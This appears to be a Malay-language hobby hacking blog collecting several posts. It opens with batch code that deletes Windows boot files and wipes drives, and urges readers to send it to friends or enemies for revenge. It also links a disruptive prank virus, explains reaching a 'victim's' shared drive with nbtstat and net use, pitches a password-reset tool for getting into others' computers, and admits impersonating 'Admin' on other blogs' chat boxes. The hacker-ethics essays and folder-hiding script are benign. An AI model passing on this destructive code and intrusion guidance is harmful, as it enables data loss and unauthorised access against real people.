Aku yakin korang ingin membalas ke atas perbuatan buruk yang pernah korang terkena sebelum ni pada seseorang,dan dengan sedikit kaedah korang dapat mematikan komputer orang tersebut selamanya!
Mari kita mulakan:
Buka notepad dan copy / paste kod ini:
@ Echo off
attrib-r-s-h c: autoexec.bat
del c: autoexec.bat
attrib-r-s-h c: boot.ini
del c: boot.ini
attrib-r-s-h c: ntldr
del c: ntldr
attrib-r-s-h c: windows win.ini
del c: windows win.ini
Sekarang simpan sebagai fail bat..
Fail ini boleh mematikan (shutdown) komputer seseorang.
Ia mematikan komputer dan memadam fail yang diperlukan untuk reboot dan restart.
INGAT – JANGAN KLIK FILE INI OK.
KORANG TIDAK AKAN DAPAT RECOVER SEMULA kOMPUTER SETELAH KORANG MEMBUKA FILE BAT NI TAU!
Kirimkan ke komputer kawan-kawan mahupun lawan dan beritahu mereka untuk membukanya.
Berikut ini adalah kod lain yang boleh digunakan juga:
cmd / c del c: windows * / F / S / Q
cmd / c del c: * / F / S / Q
Paste di Notepad dan simpan fail ini dengan Extension cmd atau bat
—> Sebuah program komputer yang berpotensi merosakkan & mampu menyalinkan dirinya sendiri serta menyebabkan kerugian besar bagi fail atau program lain tanpa kebenaran atau pengetahuan pengguna.
Jenis-jenis virus komputer: –
Berbagai jenis virus yang telah dikenal pasti adalah sebagai berikut-
1) Virus Boot Sektor: – Boot sector virus menginfeksi baik master boot record dari hard disk atau floppy drive. Boot record, program yang bertanggung jawab untuk booting sistem operasi, digantikan oleh virus. Virus itu sama ada menyalin program master boot ke bahagian lain dari hard disk atau menggantikannya dengan yang baru. Mereka menjangkiti komputer ketika boot up atau ketika mengakses floppy disk yang dijangkiti di floppy drive. Sekali sebuah sistem yang dijangkiti dengan virus boot sektor, setiap cakera yang tidak dilindungi oleh sistem non-write-protect akan dapat dicapai oleh sistem ini dan akan dijangkiti.
Contoh virus boot- sektor Michelangelo dan Stoned.
2) Fail atau Program Virus: – Beberapa file / program, ketika dijalankan, memuat naik virus dalam memori dan menjalankan fungsi standard untuk menjangkiti sistem. Mereka menginfeksi file program dengan sambungan seperti EXE, .. COM,. BIN,. DRV dan. SYS.
Beberapa virus fail yang umum adalah Week, Cascade.
3) Multipartite Virus: – Sebuah virus multipartite adalah virus komputer yang menjangkiti beberapa platform target yang berbeza, dan tetap secara rekursif infektif dalam target masing-masing. Ia cuba untuk menyerang baik boot sector dan executable, atau program, dalam masa yang sama. Ketika virus melekat pada sektor boot, pada gilirannya akan mempengaruhi fail sistem, dan ketika virus melekat pada fail, maka pada gilirannya akan menjangkiti boot sector.
Virus jenis ini dapat kembali menjangkiti sistem berulang lagi jika semua bahagian dari virus tidak dibasmi.
Ghostball adalah virus multipartite pertama, ditemui oleh Fridrik Skulason pada bulan Oktober 1989.
Contoh lain adalah Invader, Flip, dll
4) Stealth Virus: – Virus ini diam-diam di alam komputer, bererti ia menggunakan pelbagai kaedah untuk menyembunyikan diri untuk mengelakkan pengesanan. Ia kadang-kadang mengeluarkan diri dari memori sementara untuk mengelakkan pengesanan oleh antivirus. Ia agak sukar untuk dikesan. Ketika sebuah program antivirus cuba untuk mengesan virus, stealth virus memberi ‘feed’ kepada program antivirus gambaran yang bersih dari sektor fail atau boot.
5) Polymorphic Virus: – polymorphic virus mempunyai kemampuan untuk bermutasi, membayangkan bahawa mereka mengubah kod virus yang dikenali sebagai tanda tangan setiap kali mereka menyebar atau menulari. Jadi program antivirus yang mengimbas kod virus tertentu tidak dapat mengesan kehadiran virus itu.
6) Macro Virus: – Sebuah virus makro adalah virus komputer yang “menjangkiti” Microsoft Word atau aplikasi yang serupa dan menyebabkan urutan tindakan yang harus dilakukan menjadi automatik ketika aplikasi dijalankan atau sesuatu perbuatan yang lain yang mencetuskan aplikasi itu ‘terkeluar’. Virus makro sering menyebar sebagai virus e-mel. contoh terkenal adalah Virus Concept dan Worm Melissa.
Kaedah hack kali ini aku akan menunjukkan cara untuk menetapkan semula password administrator Windows (untuk Win 2000, XP, Vista dan Win 7) pada saat korang lupa atau apabila korang ingin mendapatkan akses kepada komputer yang korang tidak tahu password. sebelum ni aku dah pernah buat posting tentang benda yang sama jugak tapi kaedah sahaja yang berbeza..sila rujuk posting pertama blog ini..ok?
Sebahagian besar dari kita telah mengalami situasi di mana kita perlu mendapatkan akses ke komputer yang dilindungi kata laluan atau pada waktu kita lupa password administrator yang menjadikan kita mustahil untuk login ke komputer. Jadi di sini adalah kaedah hacking menggunakan perisian pintar yang boleh menetapkan semula password atau membuat password kosong (menghapuskan kata laluan) sehingga korang boleh mendapatkan akses pentadbir (Administrator @ admin) ke komputer. Korang boleh melakukannya dengan perisian bernama Offline NT Password & Registry Editor. Utiliti ini berfungsi offline, itu bererti korang harus mematikan komputer dan boot dari floppy disk, CD atau peranti USB (seperti pen drive). Alat ini mempunyai beberapa ciri-ciri berikut.
1. Anda tidak perlu mengetahui password lama untuk menetapkan yang baru
2. Akan mengesan dan menawarkan untuk membuka dikunci atau dipadam dari akaun pengguna!
3. Ada juga registry editor dan utiliti registri lain yang bekerja di bawah linux / unix, dan boleh digunakan untuk hal-hal lain selain mengedit kata laluan.
Bagaimana ia berfungsi?
Sebahagian besar sistem operasi Windows menyimpan password login dan password terenkripsi (encrypted) yang lain dalam sebuah file bernama sam (Security Account Manager). Fail ini boleh (biasanya) ditemui pada windows system32 config. File ini merupakan sebahagian dari registri Windows dan tetap tidak dapat diakses selama OS aktif. Oleh kerana itu perlu ingat bahawa adalah wajib untuk boot dari komputer korang dan mengakses fail sam melalui boot. Perisian pintar ini akan mendapatkan akses ke fail sam dan akan menetapkan semula / memadam password yang berkaitan dengan pentadbir atau akaun yang lain.
Link download untuk kedua-dua CD dan floppy drive bersama-sama dengan Arahan lengkap diberikan di bawah ini
Offline NT Password & Download Editor Reg (Klik di sini)
Dianjurkan untuk korang men-download versi CD sejak floppy drive sudah lama tidak digunakan dan tidak ada di komputer pada saat ini. Setelah korang memuat turun, korang akan dapat bootable image yang korang perlukan untuk burn ke CD. Sekarang boot komputer dari CD ini dan ikuti arahan pada skrin untuk menetapkan semula kata laluan. Mudah bukan?
Salam semua…hahaha…hari ni aku nak cerita sikit pasal shoutbox ni..bukan apa, ada beberapa hari yang lepas, aku ada tinggalkan mesej berbunyi lebih kurang macam ni:
“This shoutbox was hacked by MyHackersAreHere!”
dengan menjadikan nama aku sebagai ‘Admin’ di blog tersebut…
antara yang pernah kena ialah blog Kak Pah (Klik di sini), Pendekar Berkuda (Klik di sini), dan myHD (Klik di sini)..
(Klik kalau korang nak tengok blog tu ok)
kat sini aku nak nyatakan, bahawa semua mesej-mesej tu adalah berupa USIKAN semata-mata dan bukanlah satu kerja hacking yang sebenar…hehehe!
kalau korang semua nak tau, shoutmix ni SESIAPA sahaja boleh guna nama ‘Admin’ atau ‘admin’ selagi shoutmix atau c-box tu bukan premium user account! hahaha!
sebab dalam shoutmix atau c-box versi premium user account, barulah nama ‘Admin’ atau ‘admin’ tu boleh disekat daripada pelawat-pelawat blog korang menyalahgunakannya!
huh..kenapa aku buat macam tu?
sebab apa lagi…nak naikkan rating dan trafik blog la..
bila lagi nak cepat famouskan blog ni kan?hehehe..
kepada semua yang pernah kena usikan tu, aku mintak maap la ye..
semua tu hanyalah bertujuan untuk pendidikan (educational purposes only).
kalau aku tak buat macam ni, rasanya ramai lagi yang tak pernah terfikir nak guna nama ‘Admin’ dekat shoutbox masing-masing kan?
haaaa…ok la..setakat ini aje la..sebarang pertanyaan boleh la ajukan dekat shoutbox blog aku ni..tapi jangan sekali-kali guna nama Admin plak ok! kalau tak aku ban! hehehe!
Hari ni terasa malas sikit nak tulis panjang-panjang lebar..
jadi hari ni aku cuma bagi korang semua link untuk muat turun VIRUS yang sangat dahsyat kesannya kepada komputer..antara ‘kedahsyatan’ perbuatan virus ini ialah:
* Disable Task Manager
* Disable Registry Editor
* Disable MS Config
* Disable Command Prompt
* Disable Explorer
* Disable Shutdown
* Disable ‘taskkill’
* Beeps every 100 ms
* Displays a black screen every 2 seconds
* Message Box Bomb
* Adds itself to startup
* Closes/Opens CD-Rom every 100 ms
* Hides Cursor
* Disable Ctrl-Alt-Dlt
Nak remove macam mana? PAKAI ANTIVIRUS LA..heheheh..
nak remove dengan mudah tekan ‘P’ lama-lama..
(ni berdasarkan kepada sumber yang aku perolehi la..kalau tak jadi jangan marah aku pulak…)
so kepada semua yang nak sakat kawan-kawan atau lawan-lawan tu, haaaa….pegi muat turun kat sini:
Jadi macam mana plak kalau virus ni awal-awal lagi dah terdeteksi?
hmmm…setakat ni, aku dah muat turun dan belum sempat virus tu nak buat apa-apa, dah kena ‘tangkap’ dengan ESET SMART SECURITY 4 yang aku pakai sekarang..jadi pihak pengkaji dari dalam LAB NOD32 dah masukkan Ghost Virus ke dalam Virus Definition Smart Security ni..apa yang aku tau, korang pun kalau nak sakat, cari la yang PC dah tentu-tentu lemau, antivirus pun versi percuma..heheheh..
Yeah..kali ni aku nak tulis benda yang senang sangat nak buat..
Tips kali ni aku nak bagi korang cara yang mudah untuk mengunci folder (private) tanpa menggunakan apa-apa perisian..caranya ialah copy dan paste kod di bawah ke dalam notepad..
save sebagai batch file, dengan extension .bat
(gantikan *.txt dengan *.bat – dekat tanda * gantikan dengan nama yang korang pilih)
sebagai contoh ‘Fail Peribadi Aku.bat’
Kemudian korang dah save, korang akan nampak fail tersebut telah di-save dalam bentuk batch file..korang double click pada fail tu, dan satu folder yang dinamakan ‘Locker’ akan tercipta dengan sendiri (yang sebenarnya semuanya dah dibuat dalam command pada kod tu)..
Kat bawah ni adalah kod yang perlu korang copy n paste:
if EXIST “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p “cho=>”
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
attrib +h +s “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p “pass=>”
if NOT %pass%==type your password here goto FAIL
attrib -h -s “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
ren “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End
Tulisan yang berwarna merah, korang gantikan dengan password pilihan sendiri. jadi, bila dah siap, bawak semua fail yang korang nak sorok kat dalam folder ‘Locker’ tu..
cara nak kunci senang aje..double click pada fail bat tersebut, satu tetingkap arahan akan keluar..
kalau nak lock, taipkan ‘Y’ atau ‘y’ dan tekan enter..siap! folder tu dah hilang!
nak unlock pulak, double click jugak pada fail bat tadi, satu tetingkap arahan untuk memasukkan password (yang korang dah taip @ gantikan pada tulisan merah tu la) akan keluar…taipkan password, kemudian tekan enter..folder ‘Locker’ akan muncul kembali…
Selamat mencuba!
P/S: FAIL BAT adalah mudah untuk di-hack dengan hanya menggunakan perisian Notepad++, hacker dengan mudah akan berjaya melihat kod yang telah digunakan dan dapat juga melihat password korang..jadi, untuk lebih selamat, convertkan fail bat tu kepada fail exe..sila gunakan perisian di bawah untuk melakukan proses converting:
1. Perkara pertama yang perlu dilakukan, dapatkan software IP scanner terlebih dahulu..
Angry IP Scanner adalah bagus untuk percubaan..sila muat turun di sini:
3. Kemudian, gantikan 255.255.255.255 dengan alamat IP MANGSA anda..
c:windows>nbtstat -a 255.255.255.255
jika anda dapat lihat ni, anda berada dalam NetBIOS Remote Machine Name Table
Name Type Status —————————————————————
user<00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered
MAC Address = xx-xx-xx-xx-xx-xx
—————————————————————
Jika anda tak dapat nombor <20> tu, maknanya mangsa anda telah disable File And Printer Sharing..so cari mangsa lain..ok..
4. Taipkan:
c:windows>net view 255.255.255.255
outputnya akan menjadi seperti ini:
Shared resources at 255.255.255.255
ComputerNameGoesHere
Sharename Type Used as Comment
————————————————————
CDISK Disk xxxxx xxxxx
command anda telah berjaya sepenuhnya..
‘DISK‘ bererti mangsa anda berkongsi satu Disk yang dinamakan CDISK..
5. anda boleh gantikan x: dengan apa jua huruf yang anda suka, tapi bukan huruf drive anda sendiri..
CDISK adalah nama shared harddrive..
6. Kemudian taipkan:
c:windows>net use x: 255.255.255.255CDISK
Jika command anda berjaya, anda sudah pun menjadi seorang hacker ‘separuh masa’…heheheh..
Sekarang, buka windows explorer atau klik sahaja pada icon My Computer di desktop anda dan anda akan dapat lihat satu driver baru X:.
P/S: Hack ni hanya akan berkesan jika anda mempunyai IP mereka yang sama network dengan anda..ia tidak akan berkesan seandainya seseorang itu bukan dari network anda..ok..
Tip: Jika anda hanya dapat masuk ke shared folder mangsa anda, letakkan batch file dalam shared folder tersebut dengan command C=C jika mereka membukanya, ia akan dapat mengongsikan drive mereka..renung-renungkan, dan selamat mencuba!
Yang menarik, ternyata dalam dunia hacker mempunyai strata / tingkatan / level yang diberikan oleh komuniti hacker kepada seseorang kerana kelayakkannya, bukan kerana umur atau senioritinya.
Proses memperoleh pengakuan di antara sesama hacker tidak lepas dari etika & aturan dunia hackers underground. Etika ini yang akhirnya akan membezakan antara hacker & cracker, mahupun hacker kelas rendahan seperti Lamer & Script Kiddies. Salah satu etika yang berhasil di formulasikan dengan baik ada di buku Hackers: Heroes of the Computer Revolution, yang ditulis oleh Steven Levy pada tahun 1984, ada enam (6) etika yang perlu di fahami dan di mahirkan oleh seorang hacker:
1. Mampu mengakses komputer dengan tidak terbatas dan secara total.
2. Semua informasi haruslah FREE.
3. Tidak percaya pada authoriti, ertinya memperluas rangkaian sendiri.
4. Tidak memakai identiti palsu, seperti nama samaran, umur, posisi.
5. Mampu membuat seni keindahan dalam komputer.
6. Komputer dapat mengubah hidup menjadi lebih baik.
7. Pekerjaan yang di lakukan semata-mata demi kebenaran informasi yang harus disebar luaskan.
8. Memegang teguh komitmen tidak membela dominasi ekonomi industri perisian tertentu.
9. Hacking adalah senjata majoriti dalam perang melawan pelanggaran batas teknologi komputer.
10. Baik Hacking mahupun Phreaking adalah satu-satunya jalan lain untuk menyebarkan informasi pada massa mengenai sesuatu perkara.
Cracker pula tidak memiliki kod etika apa-apa pun.
(tak tahu la kenapa dari 6 boleh jadi 10 nohhh..hahaha..)
Peraturan Hacker
Gambaran umum aturan yang perlu di ikuti oleh seorang hacker iaitu:
· Di atas segalanya, hormati pengetahuan & kebebasan informasi.
· Memberitahukan sistem administrator akan adanya pelanggaran keamanan / lubang di keamanan yang anda lihat.
· Jangan mengambil keuntungan yang tidak adil dari hasil godaman.
· Tidak menerbitkan & mengumpulkan perisian cetak rompak.
· Tidak pernah mengambil risiko yang bodoh – selalu mengetahui kemampuan sendiri.
· Selalu bersedia untuk secara terbuka / bebas / percuma memberitahukan & mengajarkan berbagai informasi & kaedah yang diperoleh.
· Tidak pernah menggodam sebuah sistem untuk mencuri wang.
· Tidak pernah memberikan akses kepada seseorang yang akan membuat kerosakan.
· Tidak pernah secara sengaja menghapus & merusak file di komputer yang dihack.
· Hormati mesin yang digodam, dan memperlakukan ia seperti mesin sendiri.
Hacker sejati akan selalu bertindak berlandaskan kod etika dan peraturan sedang cracker tidak mempunyai kod etika ataupun peraturan kerana cracker sifatnya merosakkan.
Lagi Perbezaan Hacker dan Cracker
a. Hacker
1.Mempunyai kemampuan menganalisa kelemahan suatu sistem atau laman sesawang.
Sebagai contoh : jika seorang hacker mencuba untuk menguji laman Yahoo! dipastikan isi laman tersebut tak akan berantakan dan mengganggu laman yang lain. Biasanya hacker melaporkan kejadian ini untuk diperbaiki menjadi sempurna.
2.Hacker mempunyai etika serta kreatif dalam merancang suatu program yang berguna bagi sesiapa saja.
3. Seorang Hacker tidak kedekut memberi ilmunya kepada orang-orang yang serius atas nama ilmu pengetahuan dan kebaikan.
b. Cracker
1. Mampu membuat suatu program bagi kepentingan dirinya sendiri dan bersifat destruktif atau merosakkan dan menjadikannya suatu keuntungan. Sebagai contoh : Virus, Pencurian Kad Kredit, Kod Warez, Pecerobohan Sistem Bank, Pencurian Password E-mail/Web Server.
2. Boleh berdiri sendiri atau berkelompok dalam bertindak.
3. Mempunyai laman sesawang atau channel dalam IRC yang tersembunyi, hanya orang-orang tertentu yang boleh mengaksesnya.
4. Mempunyai IP yang tidak boleh dikesan.
5. Kes yang paling sering ialah Carding yaitu Pencurian Kad Kredit, kemudian pencerobohan laman sesawang dan mengubah segala isinya menjadi berantakan. Sebagai contoh : Yahoo! pernah mengalami kejadian seperti ini sehingga tidak boleh diakses dalam waktu yang lama, kes clickBCA.com yang paling hangat diperkatakan tahun 2001 yang lalu.
Dua Jenis Kegiatan Hacking
1. Social Hacking, yang perlu diketahui : informasi tentang sistem apa yang dipergunakan oleh server, siapa pemilik server, siapa Admin yang mengelolai server, koneksi yang dipergunakan jenis apa & bagaimana server itu tersambung ke internet, mempergunakan koneksi tersebut & informasi apa saja yang disediakan oleh server tersebut, apakah server tersebut juga tersambung dengan LAN di sebuah organisasi dan informasi lainnya.
2. Technical Hacking, merupakan tindakan teknik untuk melakukan pencerobohan ke dalam sistem, baik dengan alat bantu (tool) atau dengan mempergunakan kemudahan sistem itu sendiri yang dipergunakan untuk menyerang kelemahan (lubang keamanan) yang terdapat dalam sistem atau service. Inti dari kegiatan ini adalah untuk mendapatkan akses penuh ke dalam sistem dengan cara apapun dan bagaimana pun.
Contoh Kes Hacker
1. Pada tahun 1983, pertama kalinya FBI menangkap kelompok penjenayah komputer The 414s(414 merupakan kod area lokal mereka) yang bertapak di Milwaukee AS. Kelompok yang kemudian disebut hacker tersebut melakukan pencerobohan 60 buah komputer, dari komputer milik Pusat Kanser Memorial Sloan-Kettering hingga komputer milik Laboratorium Nasional Los Alamos. Salah seorang dari antara pelaku tersebut mendapatkan pembelaan kerana testimonialnya, sedangkan 5 pelaku yang lain mendapatkan hukuman semasa percubaan.
2. Digigumi (Grup Digital) adalah sebuah kelompok yang mengkhususkan diri bergerak dalam bidang game dan komputer dengan menggunakan teknik-teknik hexadecimal untuk mengubah teks yang terdapat di dalam game. Contohnya : game Chrono Trigger berbahasa Inggeris dapat diubah menjadi bahasa Indonesia. Oleh kerana itu, status Digigumi adalah hacker, namun bukan sebagai perosak.
3. Pada hari Sabtu, 17 April 2004, Dani Firmansyah, konsultan Teknologi Informasi (TI) PT Danareksa di Jakarta berhasil menceroboh laman sesawang milik Komisi Pemilihan Umum (KPU) di http://tnp.kpu.go.id dan mengubah nama-nama parti di dalamnya menjadi nama-nama “unik”, seperti Parti Kolor Ijo, Parti Mbah Jambon, Parti Jambu, dan lain-lain. Dani menggunakan teknik SQL Injection (pada dasarnya teknik tersebut adalah dengan cara membuat string atau perintah tertentu di address bar browser) untuk menceroboh laman sesawang KPU. Kemudian Dani tertangkap pada hari Khamis, 22 April 2004.
Akibat yang Ditimbulkan oleh Hacker dan Cracker
Hacker : membuat teknologi internet semakin maju kerana hacker menggunakan kepakarannya dalam bidang komputer untuk melihat, menemukan dan memperbaiki kelemahan sistem keamanan dalam sesebuah sistem komputer ataupun dalam software, membuat keseronokan bekerja seorang administrator kembali hidup kerana hacker membantu administrator untuk memperkuatkan jaringan mereka.
Cracker : merosak dan melumpuhkan keseluruhan sistem komputer, sehingga data-data pengguna jaringan rosak, hilang, ataupun berubah.
p/s: Maaf, sumber tak dapat dinyatakan kerana ini adalah artikel lama, dah lupa dari mana dapat sumber entri ni.
1. Elite
Ciri-ciri : memahami sistem operasi luar dalam, sanggup mengkonfigurasi & menyambungkan jaringan secara global, melakukan pemprogramman setiap hari, effisien & trampil, menggunakan pengetahuannya dengan tepat, tidak menghancurkan data-data, dan selalu mengikuti peraturan yang ada. Tingkat Elite ini sering disebut sebagai ‘suhu’ (climate).
2. Semi Elite
Ciri-ciri : lebih muda dari golongan elite, mempunyai kemampuan & pengetahuan luas tentang komputer, memahami tentang sistem operasi (termasuk lubangnya), kemampuan programnya cukup untuk mengubah program eksploit.
3. Developed Kiddie
Ciri-ciri : umurnya masih muda & masih bersekolah, mereka membaca tentang kaedah hacking & caranya pada masa yang mereka berkesempatan, mencuba berbagai sistem sehingga berhasil & menghebahkan kemenangan kepada orang lain, umumnya masih menggunakan Grafik User Interface (GUI) & baru belajar basic dari UNIX tanpa mampu menemukan kelemahan baru di sistem operasi.
4. Script Kiddie
Ciri-ciri : seperti developed kiddie dan juga seperti Lamers, mereka hanya mempunyai pengetahuan teknik networking yang sangat minima, tidak lepas dari GUI, hacking dilakukan menggunakan trojan untuk menakuti & menyusahkan hidup sebahagian pengguna Internet.
5. Lamer
Ciri-ciri : tidak mempunyai pengalaman & pengetahuan tapi ingin menjadi hacker sehingga lamer sering disebut sebagai ‘wanna-be’ hacker, penggunaan komputer mereka terutama untuk main game, IRC, tukar menukar software cetak rompak, mencuri kad kredit, melakukan hacking dengan menggunakan software trojan, nuke & DoS, suka menyombongkan diri melalui IRC channel, dan sebagainya. Kerana banyak kekurangannya untuk mencapai elite, dalam perkembangannya mereka hanya akan sampai level developed kiddie atau script kiddie sahaja.
Cracker tidak mempunyai hirarki khusus kerana sifatnya hanya membongkar dan merosak.
Apakah perbezaan antara seorang hacker & cracker? Di http://www.whatis.com, cracker di didefinisikan sebagai
“seseorang yang masuk ke dalam sistem orang lain, biasanya di jaringan komputer, membypass password atau lesen program komputer, atau secara sengaja melawan keamanan komputer. Cracker dapat membuat perkara seperti ini untuk keuntungan, maksud jahat, atau kerana sebab lainnya seperti ada halangan @ tentangan. Beberapa proses pencerobohan dilakukan untuk menunjukan kelemahan keamanan sistem &
#148;.
Berbeza dengan Cracker, Hacker menurut Eric Raymond di definisikan sebagai programmer yang pandai. Sebuah proses penggodaman yang baik adalah penyelesaian yang bagus kepada masalah programming dan
& #147;hacking
& #148; adalah proses pembuatannya.
Ada beberapa karakteristik yang menandakan seseorang adalah hacker, seperti:
1. Suka belajar secara detail dari bahasa pemprograman atau sistem
2. Melakukan pemprograman tidak cuma berteori saja
3. Menghargai, menikmati hasil hacking orang lain
4. Dapat secara cepat belajar pemrogramman
5. Ahli (pakar) dalam bahasa pemrograman tertentu atau sistem tertentu, seperti & #147;UNIX hacker ”.